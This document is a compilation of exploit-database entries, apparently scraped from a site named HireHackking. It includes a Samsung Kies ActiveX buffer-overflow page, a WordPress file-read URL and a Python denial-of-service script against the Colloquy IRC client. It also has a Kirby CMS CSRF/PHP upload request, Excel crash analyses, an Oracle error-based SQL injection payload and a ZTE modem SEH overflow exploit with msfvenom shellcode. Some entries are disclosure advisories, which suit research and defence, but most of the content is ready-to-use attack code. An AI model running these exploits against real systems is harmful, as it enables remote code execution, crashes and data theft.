HireHackking

source: https://www.securityfocus.com/bid/57249/info Samsung Kies is prone to a remote buffer-overflow vulnerability because it fails to properly validate user-supplied input before copying it into a fixed-length buffer. Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed attacks may cause a denial-of-service condition. <html> <!-- (c)oded by High-Tech Bridge Security Research Lab --> <head> <title>Remote Buffer Overflow Vulnerability in Samsung Kies v. 2.5.0.12114_1 </title> </head> <script language='vbscript'> Sub PoC() arg1="defaultV" arg2=String(14356, "A") arg3=1 arg4=1 Target.PrepareSync arg1 ,arg2 ,arg3 ,arg4 End Sub </script> <body> <h3>Remote Buffer Overflow Vulnerability in Samsung Kies by High-Tech Bridge Security Research Lab</h3> <input language=VBScript onclick=PoC() type=button value="Proof of Concept"> </body> <object classid='clsid:EA8A3985-F9DF-4652-A255-E4E7772AFCA8'id='Target'></object> </html>

source: https://www.securityfocus.com/bid/57256/info The Gallery plugin for WordPress is prone to an arbitrary file-access vulnerability. Remote attackers can exploit this issue to read arbitrary files. This may lead to further attacks. Gallery 3.8.3 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/plugins/gallery-plugin/gallery-plugin.php?filename_1=[AFR]

source: https://www.securityfocus.com/bid/57255/info Colloquy is prone to a remote denial-of-service vulnerability. Successful exploits may allow the attacker to cause the application to crash, resulting in denial-of-service conditions. Colloquy 1.3.5 and 1.3.6 are vulnerable. ################################################################################### # # # # # H O W - T O # # # # # ####################### # # Provide the Target: Server, Port, Nickname and the script will deliver # the payload... # # [!USE/]$ ./<file>.py -t <server> -p <port> -n <nickname> # ################################################################################### from argparse import ArgumentParser from time import sleep import socket shellcode = { # One Shot <3 'one_shot' : [ \ "687474703a2f2f782f2e2425235e26402426402426232424242425232426", "23242623262340262a232a235e28242923404040245e2340242625232323", "5e232526282a234026405e242623252623262e2f2e2f2e2e2f2e2e2f2324", "2e24" ], # 1.3.5 '1_3_5' : [ \ "687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428", "292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874", "74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c" "7573657228292c2873656c6563742532302d2d687474703a2f2f" ], # 1.3.6 - ( Requires Sending 25 Times ) '1_3_6' : [ \ "687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428", "292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874", "74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c", "7573657228292c2873656c6563742532302d2d687474703a2f2f" ], } def own( sock, target, sc_key='one_shot' ): sc = ''.join( shellcode[sc_key] ) targ = ''.join( ''.join( [ hex( ord( ch ) ) for ch in target ] ).split( '0x' ) ) msg = "505249564d534720{}203a{}0d0a".format( targ, sc ) if sc_key not in '1_3_6': sock.send( bytes.fromhex( msg ) ) else: try: for x in range( 1, 26 ): sock.send( bytes.fromhex( msg ) ) sleep( .64 ) except: print( 'FAILED!') def connect( uri, port, target, sc_key ): sock = socket.socket() try: ret = sock.connect_ex(( uri, int( port ) )) sock.recv(8096) except: print( "\t[-] Failed To Connect To {}".format( uri ) ) exit() sock.send( b"\x4e\x49\x43\x4b\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x0d\x0a" ) sock.send( b"\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48\x45\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x3c\x33\x0d\x0a" ) while True: host_data = str( sock.recv( 8096 ).strip() ) if ' 396 ' in host_data: print( '\t[+] Connection Successful Sending Payload To {}'.format( target ) ) own( sock, target, sc_key ) sock.send( b'QUIT\r\n' ) sock.close() break try: msg = host_data.split() if msg[0].lower() is 'ping': sock.send( b"PONG {}\r\n".format( msg[1] ) ) continue except: pass print( '\t[!] Payload Sent, Target Should Drop Shortly <3' ) if __name__ == '__main__': parser = ArgumentParser( description='#legion Colloquy IRC DoS; Requires At Least A Nick To Target' ) parser.add_argument( '-t', '--target', dest='target', default='localhost', help="IRCD Server Uri To Connect On" ) parser.add_argument( '-p', '--port', dest='port', default=6667, help="Port To Connect On" ) parser.add_argument( '-n', '--nick', dest='nick', metavar='NICK', help="Nick To Target" ) parser.add_argument( '-s', '--shellcode', dest='shellcode', default='one_shot', help='Shell Code To Use, ( one_shot, 1_3_5, 1_3_6 )' ) args = parser.parse_args() if args.nick is None: parser.print_help() exit() connect( args.target, args.port, args.nick, args.shellcode.strip() )

============================================= - Release date: 14.09.2015 - Discovered by: Dawid Golunski - Severity: High ============================================= I. VULNERABILITY ------------------------- Kirby CMS <= 2.1.0 CSRF Content Upload and PHP Script Execution II. BACKGROUND ------------------------- - Kirby CMS "Kirby is a file‑based CMS Easy to setup. Easy to use. Flexible as hell." http://getkirby.com/ III. INTRODUCTION ------------------------- KirbyCMS has a vulnerability that allows to upload normally disallowed PHP script files. This issue can only be exploited by authenticated users, however admin role is not required. Additionally, KirbyCMS has another vulnerability - Cross-Site Request Forgery (CSRF) - which may allow attackers to perform file upload actions on behalf of an already authenticated KirbyCMS users, if an attacker manages to trick them into visiting a specially-crafted website. This issue can allow an unauthorised attacker to modify or upload new content. Both of the issues can be combined to execute arbitrary PHP code on the remote server hosting KirbyCMS, if a logged-in victim visits a malicious page containing an exploit crafted by an attacker. IV. PHP Code Execution ------------------------- KirbyCMS allows to upload content to both admin and a low privileged editor users who can access the control panel. The upload feature allows to upload images and other media files which can be referenced within the content once uploaded. KirbyCMS performs the following validation before saving an uploaded file to prohibit risky uploads: ---[ panel/app/controllers/api/files.php ]--- protected function checkUpload($file, $blueprint) { if(strtolower($file->extension()) == kirby()->option('content.file.extension', 'txt')) { throw new Exception('Content files cannot be uploaded'); } else if(strtolower($file->extension()) == 'php' or in_array($file->mime(), f::$mimes['php'])) { throw new Exception('PHP files cannot be uploaded'); } else if(strtolower($file->extension()) == 'html' or $file->mime() == 'text/html') { throw new Exception('HTML files cannot be uploaded'); ... } --------------------------------------------- As we can see it prevents uploading PHP files by checking if an uploaded file has a '.php' extension, or if the discovered MIME type of the file has been evaluated to PHP. KirbyCMS throws an exception and stops further processing if either of the conditions is true. Unfortunately, both of the checks can easily be bypassed on multiple server configurations. As many server configurations such as Ubuntu, or Debian, process several file extensions as PHP scripts, e.g.: .php, .php4, .php5. The extension check can for example be evaded by simply uploading a malicious file with the '.php4' extension. The MIME type check can also be easily bypassed by preceding the <?php script tags with <?xml tags , to trick the MIME detector into recognising the malicious file as XML thus passing the check (mime['php'] != mime['xml']). As the upload directory is not set to disable script execution by default, bypassing the checks allows to upload arbitrary PHP scripts and execute them on the remote server hosting a vulnerable KirbyCMS installation. V. CSRF ------------------------- Media files are only meant to be uploaded by authenticated users such as editors or site administrators. However, KirbyCMS's upload function does not protect against cross-site request forgery by including a special CSRF token to verify the source of the request. As a result, an attacker can prepare a specially-crafted webpage which will upload a malicious file to the remote KirbyCMS site without user's permission, if the attacker manages to trick the logged-in victim into visiting his page. VI. PROOF OF CONCEPT ------------------------- Both of the issues described above can be combined to prepare a malicious page which uploads an arbitrary PHP file as soon as a victim authenticated into KirbyCMS visits the page. An malicious CSRF html page could send a request similar to the following: POST /kirby/panel/api/files/upload/about HTTP/1.1 Host: victim_kirby_server Content-Type: multipart/form-data; boundary=---------------------------4679830631250006491995140822 Content-Length: 261 Origin: null Cookie: PHPSESSID=tjnqqia89ka0q7khl4v72r6nl1; kirby=323b04a2a3e7f00... -----------------------------4679830631250006491995140822 Content-Disposition: form-data; name="file"; filename="kirbyexec.php5" Content-Type: application/x-php <?xml > <?php phpinfo(); ?> -----------------------------4679830631250006491995140822-- uploading the file as a result into the: kirby/content/1-about directory on the server. The malicious file can then be accessed via the URL: http://victim_kirby_server/kirby/content/1-about/kirbyexec.php5 Once opened, phpinfo() page should be loaded. VII. BUSINESS IMPACT ------------------------- By combining the two issues an attacker could execute arbitrary PHP code on the remote server without any authentication to gain full control over the website using a vulnerable KirbyCMS. VIII. SYSTEMS AFFECTED ------------------------- The latest version of KirbyCMS (2.1.0) was confirmed to be exploitable. To exploit the PHP script execution vulnerability the webserver must be configured to process files as PHP with extensions other than .php. Ubuntu and Debian systems fulfill this condition. There might be more systems which are configured in this way by default, or have been reconfigured to do so. To gain access to the control panel and upload a malicious PHP file, an attacker may be able to exploit a separate, Authentication Bypass issue also discovered by Dawid Golunski, described in a separate document. IX. SOLUTION ------------------------- Upgrade to the patched version 2.1.1 released by the vendor upon this advisory. X. REFERENCES ------------------------- http://legalhackers.com http://legalhackers.com/advisories/KirbyCMS-CSRF-PHP-File-Upload-Vulnerability.txt http://getkirby.com/ http://seclists.org/fulldisclosure/2015/Sep/index.html http://www.securiteam.com/ XI. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com legalhackers.com XII. REVISION HISTORY ------------------------- 14.09.2015 - Final XIII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

Source: https://code.google.com/p/google-security-research/issues/detail?id=462 The following crash was observed in Microsoft Excel 2007 running on Windows 2003 R2. This crash was also reproduced in Microsoft Excel 2010 on Windows 7 x86 and Microsoft Excel 2013 on Windows 8.1 x86. The test environment was Excel 2007 on Windows 2003 R2 with application verifier basic checks enabled. Attached files: Original File: 683709058_orig.xls Crashing File: 683709058_crash.xls Minimized Crashing File: 683709058_min.xls The minimized crashing file shows two deltas from the original. The first at offset 0x237 is in the data of the 4th BIFFRecord and the second delta at offset 0x34a5 is in the type field of a BIFFRecord. File versions: Excel.exe: 12.0.6718.5000 MSO.dll: 12.0.6721.5000 Observed Crash: eax=00000000 ebx=00000000 ecx=0ce119f8 edx=00003fff esi=0e98de10 edi=0013c82c eip=30037cc5 esp=00137180 ebp=00137188 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 *** ERROR: Symbol file could not be found. Defaulted to export symbols for Excel.exe - Excel!Ordinal40+0x37cc5: 30037cc5 0fb64604 movzx eax,byte ptr [esi+4] ds:0023:0e98de14=?? 0:000> kb L8 ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00137188 303df098 0e98de10 00000000 00000102 Excel!Ordinal40+0x37cc5 0013d068 30528190 0013d0a8 00000102 00000000 Excel!Ordinal40+0x3df098 0013d2bc 305280b1 00000000 00000001 00000008 Excel!Ordinal40+0x528190 0013d330 3038d46d 0013ddf2 00000000 00000001 Excel!Ordinal40+0x5280b1 0013e000 300084a4 0013e104 00000001 0013f568 Excel!Ordinal40+0x38d46d 0013fbb0 30005e9a 02270fd7 00000003 30f61708 Excel!Ordinal40+0x84a4 0013feb8 30003b3a 00000000 02270fd7 00000003 Excel!Ordinal40+0x5e9a 0013ff30 30003884 30000000 00000000 02270fd7 Excel!Ordinal40+0x3b3a In this crash esi is a heap address. We can see that this is a free chunk: 0:000> !heap -p -a 0xe98de10 address 0e98de10 found in _DPH_HEAP_ROOT @ 1161000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) e7f0fc0: e98d000 2000 7c83e330 ntdll!RtlFreeHeap+0x0000011a 018b1611 vfbasics!AVrfpRtlFreeHeap+0x000000a8 331039d5 mso!Ordinal1743+0x00002d4d 329c91d1 mso!MsoFreePv+0x0000003f 30298310 Excel!Ordinal40+0x00298310 30300ac3 Excel!Ordinal40+0x00300ac3 305f1899 Excel!Ordinal40+0x005f1899 This is a use after free vulnerability affecting all currently supported versions of Microsoft Excel. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38214.zip

Source: https://code.google.com/p/google-security-research/issues/detail?id=464 The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013. Attached files: Original File: 1105668828_orig.xls Crashing File: 1105668828_crash.xls Minimized Crashing File: 1105668828_min.xls The minimized crashing file shows two one bit deltas from the original file. The first delta at offset 0x1CF7E and the second is at offset 0x3A966. Both of these offset appear to be BIFFRecord lengths. File Versions: Excel.exe: 12.0.6718.5000 MSO.dll: 12.0.6721.5000 Observed Crash: eax=00000000 ebx=00000000 ecx=00000000 edx=0012e3bc esi=0ecd8ff0 edi=0000089e eip=3035a5ed esp=0012e3b0 ebp=0012e410 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 3035a5e4 0f8530270a00 jne Excel!Ordinal40+0x3fcd1a (303fcd1a) 3035a5ea 8b7518 mov esi,dword ptr [ebp+18h] Excel!Ordinal40+0x35a5ed: 3035a5ed 8b0e mov ecx,dword ptr [esi] ds:0023:0ecd8ff0=???????? 0:000> kb ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 0012e410 3035ab4d 00134dc0 0000089e 00000028 Excel!Ordinal40+0x35a5ed 00130464 3035ab9e 00000028 0000000a ffffffff Excel!Ordinal40+0x35ab4d 00131ef0 3026f1cd 00000002 00000000 00000118 Excel!Ordinal40+0x35ab9e 00132514 3026d160 0000000a 00132560 00000118 Excel!Ordinal40+0x26f1cd 0013279c 30263a3d 0e1ecfb8 0000000a 00000000 Excel!Ordinal40+0x26d160 00132c98 302636a5 0e1ecfb8 00000004 00132d20 Excel!Ordinal40+0x263a3d 00132cac 3025869a 00000004 00132d20 00000000 Excel!Ordinal40+0x2636a5 00132d2c 30258553 00134dc0 0000001a 00132d58 Excel!Ordinal40+0x25869a 00132e7c 30258470 30edc060 0e17ac00 0ebb7fac Excel!Ordinal40+0x258553 00132e94 32c50135 30edc060 0e17ac00 00133190 Excel!Ordinal40+0x258470 00132f48 32c4fb6d 00133190 0e83ce38 00000001 mso!Ordinal6768+0x13e7 00132f98 32c4fd30 00133190 00132fec 00000001 mso!Ordinal6768+0xe1f 00132ff8 32c4fb6d 000001be 0e83ce38 00000001 mso!Ordinal6768+0xfe2 00133048 32c4f756 00133190 001330cc 00000000 mso!Ordinal6768+0xe1f 00133108 32c4f0e2 00133190 30eba978 0e74ed90 mso!Ordinal6768+0xa08 0013313c 302583f2 0e74ed90 00133190 0e83ce38 mso!Ordinal6768+0x394 001331c8 302582df 0cc88fd8 00134dc0 00002020 Excel!Ordinal40+0x2583f2 00133f44 301153f9 0cc88fd8 00134b88 00000102 Excel!Ordinal40+0x2582df We can see that esi is holding a pointer to invalid memory. This is a heap address. 0:000> !heap -p -a 0xecd8ff0 address 0ecd8ff0 found in _DPH_HEAP_ROOT @ 1161000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) eb04f40: ecd8000 2000 7c83e330 ntdll!RtlFreeHeap+0x0000011a 018b1611 vfbasics!AVrfpRtlFreeHeap+0x000000a8 331039d5 mso!Ordinal1743+0x00002d4d 329c91d1 mso!MsoFreePv+0x0000003f 3025ac56 Excel!Ordinal40+0x0025ac56 3026f1cd Excel!Ordinal40+0x0026f1cd 3026d160 Excel!Ordinal40+0x0026d160 30263a3d Excel!Ordinal40+0x00263a3d 302636a5 Excel!Ordinal40+0x002636a5 3025869a Excel!Ordinal40+0x0025869a 30258553 Excel!Ordinal40+0x00258553 30258470 Excel!Ordinal40+0x00258470 32c50135 mso!Ordinal6768+0x000013e7 32c4fb6d mso!Ordinal6768+0x00000e1f Esi is a free-ed allocation. This is a use after free vulnerability. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38215.zip

# Exploit Title: Web Application Farol with anauthenticated SQLi injection # Date: 2015-09-16 # Exploit Author: Thierry Fernandes Faria [ a.k.a SoiL ] [ thierryfariaa (at) gmail (dot) com ] # Vendor Homepage:http://www.teiko.com.br/pt/solucoes/infraestrutura-em-ti/farol # Version: [All] # CVE : CVE-2015-6962 # OWASP Top10: A1-Injection +---------------------+ + Product Description + +---------------------+ The FAROL web application is a software that monitors the databases +----------------------+ + Exploitation Details + +----------------------+ A vulnerability has been detected in the login page from web application FAROL . Sql injection anauthenticated. The e-mail field at login page is vulnerable. The e-mail field is vulnerable to Error Based Sql injection. Vulnerable Page: http://target/tkmonitor/estrutura/login/Login.actions.php?recuperar Vulnerable POST Parameter: email Usage:email'[SQLi error based]-- eg: email=1'%20or%201=ctxsys.drithsx.sn(1,(select%20sys.stragg(distinct%20banner)%20from%20v$version))-- ORA-20000: Oracle Text error: DRG-11701: thesaurus CORE 11.2.0.4.0 ProductionNLSRTL Version 11.2.0.4.0 - ProductionOracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit ProductionPL/SQL Release 11.2.0.4.0 - ProductionTNS for Linux: Version 11.2.0.4.0 - Production does not exist ORA-06512: at "CTXSYS.DRUE", line 160 +----------+ + Solution + +----------+ Upgrade the software

Source: https://code.google.com/p/google-security-research/issues/detail?id=465 The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013. Attached files: Original File: 1516065514_orig.xls Crashing File: 1516065514_crash.xls Minimized Crashing File: 1516065514_min.xls The minimized crashing file shows a one bit deltas from the original file at offset 0x49E8. OffVis reports this to be the CreateTime field of an OLESSDirectoryEntry structure. File Versions: Excel.exe: 12.0.6718.5000 MSO.dll: 12.0.6721.5000 Observed Crash: When run without Application Verifier enabled the following crash occurs: eax=30272d58 ebx=03b49330 ecx=03b49144 edx=03a64d44 esi=30f6dca0 edi=03a64d40 eip=fffffffc esp=00133e80 ebp=00133e84 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 fffffffc ?? ??? 0:000> kb L8 ChildEBP RetAddr Args to Child WARNING: Frame IP not in any known module. Following frames may be wrong. 00133e7c 3028f4da 00133ec8 3028d2ef 00000005 0xfffffffc 00133e84 3028d2ef 00000005 00000001 03b49200 Excel!Ordinal40+0x28f4da 00133ec8 30290e14 03b49330 00000001 00000000 Excel!Ordinal40+0x28d2ef 00133fa0 3028a2b9 00000000 00000000 00000000 Excel!Ordinal40+0x290e14 00134130 302912ae 00000000 00000000 00000000 Excel!Ordinal40+0x28a2b9 0013414c 30286206 00000001 00000000 03b66c00 Excel!Ordinal40+0x2912ae 001341cc 302860ce 00000000 ffffffff 00000001 Excel!Ordinal40+0x286206 0013426c 30282360 03b49000 027c6a00 d107955b Excel!Ordinal40+0x2860ce In this crash case eip was corrupted to 0xfffffffc. Tracing through sub_3028F4B4 we see something along the lines of: x = *dword_30F5F9BC + 0x144; // x=0x30272d58 fptr = x + x[0x14]; // x[0x14] == 0 fptr(); // calling pointer at 0x30272d58 = 0xfffffffc It looks as though the global variable at 30f5f9bc was used with incorrect type information or otherwise corrupted. Running the same poc file again but with Application Verifier enabled gets us closer to the root of the issue with the following crash observed: eax=0ff28e50 ebx=07b42420 ecx=0012c91c edx=00000020 esi=0364efe8 edi=00000000 eip=30299c9e esp=0012c944 ebp=0012c950 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** ERROR: Symbol file could not be found. Defaulted to export symbols for Excel.exe - Excel!Ordinal40+0x299c9e: 30299c9e 8b80f0030000 mov eax,dword ptr [eax+3F0h] ds:0023:0ff29240=???????? 0:000> kb L8 ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 0012c950 3006b70a 00000005 00000001 07b42420 Excel!Ordinal40+0x299c9e 0012cc84 3006b556 0012ceb4 0020020a 07b42420 Excel!Ordinal40+0x6b70a 0012ce8c 3006b3a2 0012ceb4 0ee46ff0 00000009 Excel!Ordinal40+0x6b556 00133050 3006a11c 00133e08 0ee46ff0 00000009 Excel!Ordinal40+0x6b3a2 00133ca0 3006a01b 00133e08 0ee46ff0 00000009 Excel!Ordinal40+0x6a11c 00133d50 30069ead 00133e08 0ee46ff0 00000009 Excel!Ordinal40+0x6a01b 00133d70 302972c0 00133e08 0ee46ff0 00000009 Excel!Ordinal40+0x69ead 00133e28 302974c7 0f82ef58 00133ec0 00133eac Excel!Ordinal40+0x2972c0 We can see here that eax is being indexed at an offset of 0x3f0. However, if we look at the actual allocation for the chunk eax is pointed to we see that the allocation size was only 0x1b0. 0:000> !heap -p -a 0xff28e50 address 0ff28e50 found in _DPH_HEAP_ROOT @ 1161000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) f7b5400: ff28e50 1b0 - ff28000 2000 7c83d6d4 ntdll!RtlAllocateHeap+0x00000e9f 018b1504 vfbasics!AVrfpRtlAllocateHeap+0x000000c3 33103a8f mso!Ordinal1743+0x00002e07 329c7e66 mso!MsoPvAllocCore+0x0000005a 3000b694 Excel!Ordinal40+0x0000b694 3000b640 Excel!Ordinal40+0x0000b640 This poc behaves like a type confusion or memory corruption issue in areas not protected by application verifier. The fact the eip was corrupted indicates a high likelihood for exploitation. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38216.zip

Source: https://code.google.com/p/google-security-research/issues/detail?id=469 The following crash was observed in Microsoft Office 2007 Excel with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013. Attached files: Original File: 3013413838_orig.xls Crashing File: 3013413838_crash.xls Minimized Crashing File: 3013413838_min.xls The minimized crashing file shows a one bit delta from the original file at offset 0x139F. OffVis did not reveal anything unique about this offset in the minimized file. File Versions: Excel.exe: 12.0.6718.5000 OGL.dll: 12.0.6719.5000 oart.dll: 12.0.6683.5002 GDI32.dll: 5.2.3790.5563 Observed Crash: This crashing eip was observed 4 times in fuzzing results with various invalid memory address being dereferenced. eax=8a94e1a1 ebx=00000000 ecx=10a80598 edx=8a94e1a0 esi=0013d478 edi=0013d42c eip=3bd18f75 esp=0013d3dc ebp=0013d3e0 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 OGL!ScanOperation::Convert_24_sRGB: 3bd18f68 55 push ebp 3bd18f69 8bec mov ebp,esp 3bd18f6b 837d0800 cmp dword ptr [ebp+8],0 3bd18f6f 7431 je OGL!ScanOperation::Convert_24_sRGB+0x3a (3bd18fa2) 3bd18f71 8d4201 lea eax,[edx+1] 3bd18f74 56 push esi => 3bd18f75 0fb65001 movzx edx,byte ptr [eax+1] ds:0023:8a94e1a2=?? 0:000> kb L8 ChildEBP RetAddr Args to Child 0013d3e0 3be703b3 0000666f 0013d42c 00000000 OGL!ScanOperation::Convert_24_sRGB+0xd 0013d3fc 3be18f32 00000000 8a94e1a0 0000666f OGL!EpAlphaBlender::Blend+0x55 0013d568 3bd9f6c1 0013d894 00000000 0013d58c OGL!ConvertBitmapData+0x61 0013d5a4 3bde4137 00000000 00000001 000e200b OGL!GpMemoryBitmap::InternalLockBits+0x105 0013d5d0 3bdfa09b 05492fa8 0013d5f8 00000001 OGL!GpMemoryBitmap::LockBits+0xba 0013d608 3bdfac0c 0013d7bc 0013d894 0013d62c OGL!CopyOnWriteBitmap::PipeLockBitsFromMemory+0xb8 0013d6e8 3bd2b7e7 0013d7bc 0013d894 0013d7d0 OGL!CopyOnWriteBitmap::PipeLockBits+0x553 0013d700 3be4cc56 0013d7bc 0013d894 00000001 OGL!GpBitmap::PipeLockBits+0x4e The function OGL!ScanOperation::Convert_24_sRGB was called with edx pointing to an invalid memory location: 0x8a94e1a0. Tracing back we can find that the heap address where edx came from was allocated with the following call stack: 3be70fe2 OGL!GpMalloc+0x00000014 3bd58669 OGL!CopyOnWriteBitmap::CopyOnWriteBitmap+0x00000049 3be0517e OGL!CopyOnWriteBitmap::Create+0x00000021 3be0514d OGL!GpBitmap::GpBitmap+0x00000030 The edx value was copied in from the stack at the following location OGL!GpMemoryBitmap::InitMemoryBitmap(): 3bd4f6f0 8b45fc mov eax,dword ptr [ebp-4] 3bd4f6f3 6a06 push 6 3bd4f6f5 59 pop ecx 3bd4f6f6 8bf3 mov esi,ebx =>3bd4f6f8 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] The stack location was set with the invalid value here in OGL!ValidateBitmapInfo(): 3bda46ed 8b4d08 mov ecx,dword ptr [ebp+8] 3bda46f0 895804 mov dword ptr [eax+4],ebx 3bda46f3 895008 mov dword ptr [eax+8],edx 3bda46f6 89480c mov dword ptr [eax+0Ch],ecx => 3bda46f9 897810 mov dword ptr [eax+10h],edi Edi is set earlier as the result of an imul instruction that is then added to a base heap pointer: .text:3BDA46CB lea edi, [ebx-1] .text:3BDA46CE imul edi, edx .text:3BDA46D1 add edi, [ebp+arg_4] ; bad value here With this PoC edi=0x0000666e and edx=0x00013350. The edx value is calculated earlier in the same function. If 0xf9ef540 is the base pointer (arg_4) we end up setting this value to be 0x666e*0x13350+0xf9ef540 or 0x8a94e1a0 as we saw in the initial bad memory access. The heap chunk referenced at 0xf9ef540 has an original allocation size of 15156 and we've set our pointer far out of bounds of this allocation range. There is a distinct lack of overflow checks and bounds checking in the OGL!ValidateBitmapInfo function that may lead to memory corruption when doing bitmap conversion later on in the code. For example, if the 0x13350 value is able to grow to 0x27fd0 we can set the edi value to be 0xffffcb60 (0x666e * 0x27fd0 = 0xffffcb60) which leads to an out of bound write instead of an out of bound read later in the code. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38217.zip

#!/usr/bin/python -w # Title : ZTE PC UI USB MODEM SOFTWARE Buffer Overflow # Date : 17/09/2015 # Author : R-73eN # Tested on : Windows Xp sp3 on software Eagle Speed PCW_EAGLEALBp671A1V1.0.0B02 # Since all the PC UI based software shares the same source code they are all vulnerable.(Confirmed By ZTE) # The problem exists into the import function at PhoneBook Menu which doesn't # validate data and importing a malformed file leads to code execution. # # Triggering the Vulnerability # run this python script which will save an evil.txt file. # Open Eagle Speed, go to PhoneBook , click Import and select the evil.txt File # A calculator Should pop up. # # Disclosure Timeline: # [16/08/2015] - Vendor notified # [18/08/2015] - Vendor Responded asking for more details # [17/08/2015] - Vendor Responded that will not release a patch since the product is at end of life. # # Solution: # Don't import unknown text file. # # Video - https://www.youtube.com/watch?v=jbv1L4TrHTY # banner = "" banner +=" ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner shellcode = "" #msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x20\x3f" shellcode += "\xba\x49\xc7\x99\xe5\xda\xd7\xd9\x74\x24\xf4\x5b\x29" shellcode += "\xc9\xb1\x31\x83\xc3\x04\x31\x53\x0f\x03\x53\x46\x25" shellcode += "\x6c\x19\xb0\x2b\x8f\xe2\x40\x4c\x19\x07\x71\x4c\x7d" shellcode += "\x43\x21\x7c\xf5\x01\xcd\xf7\x5b\xb2\x46\x75\x74\xb5" shellcode += "\xef\x30\xa2\xf8\xf0\x69\x96\x9b\x72\x70\xcb\x7b\x4b" shellcode += "\xbb\x1e\x7d\x8c\xa6\xd3\x2f\x45\xac\x46\xc0\xe2\xf8" shellcode += "\x5a\x6b\xb8\xed\xda\x88\x08\x0f\xca\x1e\x03\x56\xcc" shellcode += "\xa1\xc0\xe2\x45\xba\x05\xce\x1c\x31\xfd\xa4\x9e\x93" shellcode += "\xcc\x45\x0c\xda\xe1\xb7\x4c\x1a\xc5\x27\x3b\x52\x36" shellcode += "\xd5\x3c\xa1\x45\x01\xc8\x32\xed\xc2\x6a\x9f\x0c\x06" shellcode += "\xec\x54\x02\xe3\x7a\x32\x06\xf2\xaf\x48\x32\x7f\x4e" shellcode += "\x9f\xb3\x3b\x75\x3b\x98\x98\x14\x1a\x44\x4e\x28\x7c" shellcode += "\x27\x2f\x8c\xf6\xc5\x24\xbd\x54\x83\xbb\x33\xe3\xe1" shellcode += "\xbc\x4b\xec\x55\xd5\x7a\x67\x3a\xa2\x82\xa2\x7f\x5c" shellcode += "\xc9\xef\x29\xf5\x94\x65\x68\x98\x26\x50\xae\xa5\xa4" shellcode += "\x51\x4e\x52\xb4\x13\x4b\x1e\x72\xcf\x21\x0f\x17\xef" shellcode += "\x96\x30\x32\x8c\x79\xa3\xde\x7d\x1c\x43\x44\x82" filename="evil.txt" nSEH = "\xEB\x06\x90\x90" SEH = "\xab\x11\x9f\x0f" buffer = "A" * 3136 + nSEH + SEH + shellcode + "D" * (2856 - len(shellcode)) textfile = open(filename , 'w') textfile.write(buffer) textfile.close() print "[+] Evil.txt created successfully [+]"

